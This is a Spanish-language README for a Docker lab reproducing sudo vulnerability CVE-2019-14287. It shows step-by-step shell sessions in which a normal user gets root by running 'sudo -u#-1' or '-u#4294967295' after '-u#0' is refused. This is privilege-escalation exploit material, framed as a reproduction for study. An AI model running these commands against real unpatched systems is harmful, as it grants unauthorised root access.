
PoC basado en Docker que demuestra la escalada de privilegios de sudo CVE-2019-14287 mediante la omisión de la restricción de usuario Runas, con instrucciones de reproducción paso a paso.
Es un ejemplo que reproduce la vulnerabilidad de sudo (CVE-2019-14287) en un contenedor Docker.
docker compose up -ddocker exec -it vulnerable_sudo_app bashwhoami o id para confirmar que eres un usuario normal (no root)
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
sudo -u#0 whoami y sudo -u#0 id -u no se pueden ejecutar
-u) y ejecutar$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
sudo -u#-1 whoami y sudo -u#-1 id -u para confirmar que los comandos se ejecutan como root sin autenticación (reproducción de la vulnerabilidad)
-u#4294967295$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0